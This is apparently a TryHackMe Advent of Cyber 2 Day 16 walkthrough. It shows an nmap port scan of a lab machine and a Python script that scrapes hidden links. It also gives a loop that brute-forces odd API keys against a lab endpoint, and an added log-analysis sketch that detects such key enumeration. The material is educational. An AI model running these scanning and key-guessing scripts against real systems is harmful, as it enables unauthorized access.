[TryHackMe] Advent of Cyber 2, Day 16 - Walkthrough -

In this article, 'Advent of Cyber 2' provided by TryHackMe
"Advent of Cyber 2" is offered as a "free room". You can "Deploy" the virtual machine without a subscription.

The walkthrough index for "Advent of Cyber 2" is published in "[TryHackMe] I tried participating in Advent of Cyber 2."

[Day 16] Scripting: Help! Where is Santa?



Story





Oh no! Santa has flown off and left his faithful elves behind! Can you help find out where Santa is?

Fortunately, the elves are experts at OSINT and remember a few things. Specifically:
  • Santa has a web page, MACHINE_IP/static/index.html, that helps lost elves find their way home. However, Santa did not tell the elves which port number the web server runs on. Can you find out?
  • A link is hidden somewhere on this web page. It is hidden so that anyone who is not an elf will not find it.
    - Santa's Sled has an API. The API key is between 0 and 100 and is an odd number. But be careful! After an unknown number of attempts, Santa's Sled will ban your IP address.
  • Deploy the machine running Santa's Sled and wait a few minutes for the target (MACHINE_IP) to start. Use your Python skills from Day 15 to find the correct API key.

    Day 16 - #1.



    What is the port number for the web server?
    Run a port scan with nmap.
    kali@kali:~$ nmap -Pn -T4 -A -vv 10.10.64.46
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-16 22:51 EST
    Nmap scan report for 10.10.64.46
    Host is up, received user-set (0.26s latency).
    Scanned at 2020-12-16 22:51:20 EST for 185s
    Not shown: 999 closed ports
    Reason: 999 conn-refused
    PORT     STATE SERVICE  REASON  VERSION
    8000/tcp open  http-alt syn-ack uvicorn
    | fingerprint-strings: 
    |   FourOhFourRequest: 
    |     HTTP/1.1 404 Not Found
    |     date: Thu, 17 Dec 2020 03:52:01 GMT
    |     server: uvicorn
    |     content-length: 22
    |     content-type: application/json
    |     Connection: close
    |     {"detail":"Not Found"}
    |   GetRequest: 
    |     HTTP/1.1 200 OK
    |     date: Thu, 17 Dec 2020 03:51:55 GMT
    |     server: uvicorn
    |     content-type: text/html; charset=utf-8
    |     content-length: 6992
    |     last-modified: Mon, 23 Nov 2020 00:31:30 GMT
    |     etag: 43d617909830c0d0a48bbbe8ea26ae39
    |     Connection: close
    |     <!DOCTYPE html>
    |     <html>
    |     <head>
    |     <meta charset="utf-8">
    |     <meta http-equiv="X-UA-Compatible" content="IE=edge">
    |     <meta name="viewport" content="width=device-width, initial-scale=1">
    |     <title>Santa's Tracker</title>
    |     <link rel="shortcut icon" href="" type="image/x-icon">
    |     <link rel="stylesheet" href="bulma.css">
    |     <!-- Bulma Version 0.9.0-->
    |     <link rel="stylesheet" type="text/css" href="../css/hero.css">
    |     <!-- <link rel="stylesheet" href="https://unpkg.com/bulma-modal-fx/dist/css/modal-fx.min.css" /> -->
    |     </head>
    |     <body>
    |     <section class="hero is-info is-medium is-bold">
    |   HTTPOptions: 
    |     HTTP/1.1 405 Method Not Allowed
    |     date: Thu, 17 Dec 2020 03:52:07 GMT
    |     server: uvicorn
    |     content-length: 31
    |     content-type: application/json
    |     Connection: close
    |_    {"detail":"Method Not Allowed"}
    | http-methods: 
    |_  Supported Methods: GET
    |_http-server-header: uvicorn
    |_http-title: Santa's Tracker
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 22:54
    Completed NSE at 22:54, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 22:54
    Completed NSE at 22:54, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 22:54
    Completed NSE at 22:54, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 185.49 seconds
    

    Santa's Tracking System
    Are you an Elf that Santa has forgotten? Use this system to track Santa! Note: due to how many humans try to find where Santa is, the link is hidden on this webpage. You're going to have to manually click every single link Or perhaps there is a way to find all the links as fast as a Python?

    Important notice All deliiveries to Skidy for TryHackMe jumpers are to be stopped. That man has asked for 613 on the premise that they are the softest jumper in the world. Please, we need to share them out.
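    The scan shows the port number that Santa's Tracker is running on. Let's actually access it.
    http://MACHINE_IP:PORT/static/index.html
    

    The page says "the link is hidden on this webpage. You're going to have to manually click every single link" and "Or perhaps there is a way to find all the links as fast as a Python?"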


    Day 16 - #2.



    Without using enumerations tools such as Dirbuster, what is the directory for the API? (without the API key)

    linkgrabber.py
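    from bs4 import BeautifulSoup
    import requests

    # Fetch the tracker page found on port 8000
    html = requests.get('http://10.10.64.46:8000/static/index.html', timeout=10)
    soup = BeautifulSoup(html.text, "lxml")

    # Print the href of every anchor tag, including ones not visible on the rendered page
    links = soup.find_all('a')
    for link in links:
        if "href" in link.attrs:
            print(link["href"])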
    
    kali@kali:~$ python3 linkgrabber.py | uniq
    ../
    
    https://github.com/BulmaTemplates/bulma-templates/blob/master/templates/hero.html
    https://tryhackme.com
    #
    http://machine_ip/api/api_key
    #
    https://github.com/BulmaTemplates/bulma-templates
    

    Day 16 - #3.



    Where is Santa right now?

    Day 16 - #4.



    Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
    To unblock yourself, simply terminate and re-deploy the target instance

    apibruter.py
    import requests

    # Send a single request with one candidate key to see what a rejection looks like
    api_key = 1
    html = requests.get(f'http://10.10.64.46:8000/api/{api_key}', timeout=10)

    print(html.text)
    
    kali@kali:~$ python3 apibruter.py 
    {"item_id":1,"q":"Error. Key not valid!"}
    

    apibruter_r.py
    import requests

    # Try every odd key from 1 to 99 and print each response
    for api_key in range(1, 100, 2):
        print(f"api_key {api_key}")
        html = requests.get(f'http://10.10.64.46:8000/api/{api_key}', timeout=10)
        print(html.text)
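The defender's view of the loop above, as an added example that is not part of the original walkthrough or the room: because the key travels in the URL path, a key sweep shows up in the server's access log as one client requesting many different `/api/<key>` paths. The sketch assumes uvicorn's default access-log line shape; the log lines, addresses, keys and the `max_distinct` threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed uvicorn default access-log shape: INFO:     <ip>:<port> - "GET /api/7 HTTP/1.1" 200 OK
LINE_RE = re.compile(r'^INFO:\s+(?P<ip>[\d.]+):\d+ - "GET /api/(?P<key>\d+) HTTP/1\.[01]" \d{3}')

# Constructed sample log; addresses and keys are made up, not taken from the room.
SAMPLE_LOG = """\
INFO:     10.9.0.8:51820 - "GET /static/index.html HTTP/1.1" 200 OK
INFO:     10.9.0.8:51822 - "GET /api/21 HTTP/1.1" 200 OK
INFO:     10.9.0.5:40114 - "GET /api/1 HTTP/1.1" 200 OK
INFO:     10.9.0.5:40116 - "GET /api/3 HTTP/1.1" 200 OK
INFO:     10.9.0.8:51830 - "GET /api/21 HTTP/1.1" 200 OK
INFO:     10.9.0.5:40118 - "GET /api/5 HTTP/1.1" 200 OK
INFO:     10.9.0.5:40120 - "GET /api/7 HTTP/1.1" 200 OK
INFO:     10.9.0.5:40122 - "GET /api/9 HTTP/1.1" 200 OK
INFO:     10.9.0.8:51834 - "GET /api/21 HTTP/1.1" 200 OK
"""


def keys_by_client(lines):
    """Return {client_ip: [keys in request order]} for /api/<key> requests."""
    tried = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            tried[m["ip"]].append(int(m["key"]))
    return dict(tried)


def is_sweep(keys):
    """True when the distinct keys, in first-seen order, advance by one fixed step."""
    uniq = list(dict.fromkeys(keys))
    steps = {b - a for a, b in zip(uniq, uniq[1:])}
    return len(uniq) >= 3 and len(steps) == 1


def flag_enumeration(lines, max_distinct=3):
    """Flag clients that tried more than max_distinct different keys (hypothetical threshold)."""
    report = {}
    for ip, keys in keys_by_client(lines).items():
        distinct = len(set(keys))
        if distinct > max_distinct:
            report[ip] = {"distinct_keys": distinct, "sweep": is_sweep(keys)}
    return report


if __name__ == "__main__":
    print(flag_enumeration(SAMPLE_LOG.splitlines()))
```

The walkthrough shows the rejection only as a JSON body, so the check counts distinct keys per client instead of relying on HTTP status codes.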
    







    This completes the Day 16 mission.
